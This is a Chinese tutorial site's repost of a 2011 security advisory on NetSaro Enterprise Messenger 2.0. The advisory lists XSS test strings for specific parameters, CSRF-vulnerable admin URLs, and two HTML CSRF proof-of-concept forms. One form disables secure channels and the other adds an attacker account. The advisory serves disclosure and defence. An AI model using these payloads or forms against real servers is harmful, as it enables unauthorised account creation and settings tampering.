网站地图    收藏   

主页 > 后端 > 网站安全 >

NetSaro Enterprise Messenger v2.0多重缺陷及修复 - 网站

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] ===================================================Secur-I Research Group Security Advisory [ SV-2011-004]===================================================标题: NetSaro Enterprise Messe......

===================================================
Secur-I Research Group Security Advisory [ SV-2011-004]
===================================================
标题: NetSaro Enterprise Messenger  v2.0  Multiple  Vulnerabilities
产品: Enterprise Messenger Server
存在缺陷版本: 2.0  (Other versions could also be affected)

影响:中等

Homepage: http://netsaro.com/Downloads.aspx
By: Narendra Shinde
      Secur-I Research Group
===================================================

供应商说明:

---------------------------

netsaro使您能够创建基于客户/服务器体系结构私人安全的即时通讯网络、您可以发送和接收文章邮件,语音邮件,文件或屏幕或启动多用户聊天会话
Vulnerability Information:
-----------------------------------
 
1) Multiple Cross Site Scripting vulnerabilities
 
Vulnerability Information:
-------------------------------------
Class: Improper Neutralization of Input during Web Page Generation  ('Cross-site Scripting') [CWE-79]
Impact: Insertion and Execution of malicious scripts in user browser
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction Required : Yes
 
 
Vulnerability overview/description:
-------------------------------------------------
NetSaro Enterprise Messenger Server v2.0  is prone to multiple cross-site scripting vulnerabilities as the user-supplied input received via certain  parameters is not properly sanitized. This can be exploited by submitting specially crafted input to the affected software.  Successful exploitation could allow the attacker to execute arbitrary script code within the user's browser session in the security context of the targeted site. The attacker could gain access to user's cookies (including authentication cookies), if any, associated with the targeted site, access recently submitted data by the target user via web forms, or take actions on the site masquerading as the target user.
 
 
a) Non �Persistent Cross Site Scripting
 
URL:  http://www.2cto.com :4990/login.nsp
Vulnerable Parameter : User Name
Demo string used: "></script><script>alert("XSS")</script>
 
URL : http://www.2cto.com :4990/user-search.nsp
Vulnerable Parameter : Search box
Test string used : "><script>alert("XSS")</script>
 
URL : http://www.2cto.com :4990/license-add.nsp
Vulnerable parameters :  Company , Quantity
Test string  : �><script>alert(�XSS�)</script>
 
URL:  http://www.2cto.com :4990/archive-announcement.nsp?FromUser= "><script>alert("xss")</script>
URL: http://www.2cto.com :4990/archive-message.nsp?FromUsers= "><script>alert("xss")</script>
 
 
b) Persistent Cross Site Scripting
 
URL : http://www.2cto.com :4990/department-add.nsp
Vulnerable Parameters:  Name  , Description
Test string used:  �><img src=0 onerror=alert(0)>
 
URL: http://www.2cto.com :4990/user-add.nsp
Vulnerable Parameters:   User Name, First Name , Last name , Job Title ,Email
Test string used: "><script>alert("XSS")</script>
 
URL: http://www.2cto.com :4990/department-add.nsp
Vulnerable Parameter : Name , Description
Test string : �><script>alert(�XSS�)</script>
 
Workaround:
-----------------
Proper  checks on all user input.
For more details please refer:
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
 
 
2)  Multiple CSRF vulnerabilities
 
Vulnerability Information:
------------------------------------
Class: Cross-Site Request Forgery (CSRF) [CWE-352]
Impact: Unintentional changes in application.
Remotely Exploitable: Yes
Authentication Required: No
User interaction Required : Yes
CVE Name: N/A
 
Vulnerability overview/description:
--------------------------------------------------
The NetSaro Enterprise Messenger Server Administration Console application is vulnerable to cross-site request forgery, caused by improper validation of user supplied input by Messenger Server Administration Console. By persuading an authenticated user to visit a malicious website a remote attacker could send  a malformed HTTP to edit  applications settings.
 
The following  URL's are found to be vulnerable :
 
http://www.2cto.com :4990/server-security.nsp
http://www.2cto.com :4990/server-login.nsp
http://www.2cto.com :4990/server-offline.nsp
http://www.2cto.com :4990/server-archive.nsp
http://www.2cto.com :4990/server-properties.nsp?server=webadmin
http://www.2cto.com :4990/server-properties.nsp?server=webadmin_ssl
http://www.2cto.com :4990/server-properties.nsp?server=messenger
http://www.2cto.com :4990/server-properties.nsp?server=messenger_ssl
http://www.2cto.com :4990/server-properties.nsp?server=gateway
http://www.2cto.com :4990/server-properties.nsp?server=gateway_ssl
http://www.2cto.com :4990/server-edit.nsp?server=webadmin
http://www.2cto.com :4990/server-edit.nsp?server=webadmin_ssl
http://www.2cto.com :4990/server-edit.nsp?server=messenger
http://www.2cto.com :4990/server-edit.nsp?server=messenger_ssl
http://www.2cto.com :4990/server-edit.nsp?server=gateway
http://www.2cto.com :4990/server-edit.nsp?server=gateway_ssl
http://www.2cto.com :4990/user-add.nsp
http://www.2cto.com :4990/department-add.nsp
http://www.2cto.com :4990/connection-sendannouncement.nsp
 
 
Proof of Code(POC) 1  :
 
To send Messenger, Gateway and Web administration connections on Unsecured channel.
 
<html>
<body>
<form action="http://www.2cto.com :4990/server-security.nsp" method="post">
<input id="rb101" name="secureWebAdmin" type="hidden" value="false" checked>
<input id="rb202" name="secureMessenger" type="hidden" value="false" checked>
<input id="rb302" name="secureGateway" type="hidden" value="false" checked>
<input type="hidden" name="postback" value="postback">
<input type="submit" name="save" value="Click ME :D">
</form>
</body>
</html>
 
 
Proof of Code(POC) 2:
To add user in application.
 
<html>
<body>
<form action="http://www.2cto.com :4990/user-add.nsp" method="post">
<input name="username" type="hidden" value="ATTACK">
<input name="firstname" type="hidden" value="ATTACK"></td>
<input name="lastname" type="hidden" value="ATTACK"></td>
<input type="hidden" name="department" type="hidden" value="_Default">
<input name="jobtitle" type="hidden" value="ATTACKER"></td>
<input name="email" type="hidden" value="ATTACKER@ATTACK.com">
<input type="hidden" name="authentication"value="database">
<input name="password" type="hidden" value="PASS"></td>
<input name="passwordConfirm" type="hidden" value="PASS"></td>
<imput  name="account" id="account" value="Enabled">
<input type="hidden" name="postback" value="postback">
<input name="add" type="submit" id="add" value="Click Me :D">
</form>
</body>
</html>
 
 
Workaround:
------------------
For more details please refer:
https://www.owasp.org/index.php/Cross- Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
 
Timeline:
---------
Vulnerability Found : 2011-08-28
Reported to Vendor : 2011-08-30
Confirmation from vendor : NO REPLY
Public Disclosure : 2011-08-31
 
 保密:这电子邮件和任何附件可能是保密的,也可能是特权。如果你不打算指定收件人,请立即通知发送者并没有透露给他人的内容用于任何目的,或储存或复制信息的任何介质

保密:这电子邮件和任何附件可能是保密的,也可能是特权。如果你不打算指定收件人,请立即通知发送者并没有透露给他人的内容用于任何目的,或储存或复制信息的任何介质

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论